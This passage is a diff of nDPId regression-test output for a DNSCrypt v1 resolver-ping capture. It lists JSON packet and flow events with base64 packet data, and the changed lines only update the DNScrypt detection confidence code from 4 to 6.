01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDRAAL0RMhgKAAABQlUec5yjAbsCCCOeLCoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDUgAL0RTlcKAAABQlUec7lIAbsGBPvFLCsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":47432,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":257,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312286} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":257,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDUAub0RcyoKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDZAAL0RMhYKAAABQlUec9NgAbsCCCOeLCgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDcgAL0RTlUKAAABQlUec4syAbsGBCngLCcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":260,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312286} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":260,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAABQaDcAub0RcygKAAABQlUecwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":946739312399,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312399,"pkt":"ZmZmZmZmRERERERECABFAADUFOhAADYRDa1CVR5zCgAAAQG702AAwE8ILCiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="} 
@@ -524,26 +524,26 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":946739312401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312401,"pkt":"ZmZmZmZmRERERERECABFAADUFOpAADYRDatCVR5zCgAAAQG7vUAAwGUnLCmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAIc7t1AAL0RzDEKAAABXV\/ipbSvAbsCCALbx+wBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7t4gAL0R6HAKAAABXV\/ipcAiAbsGBEBnx+kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA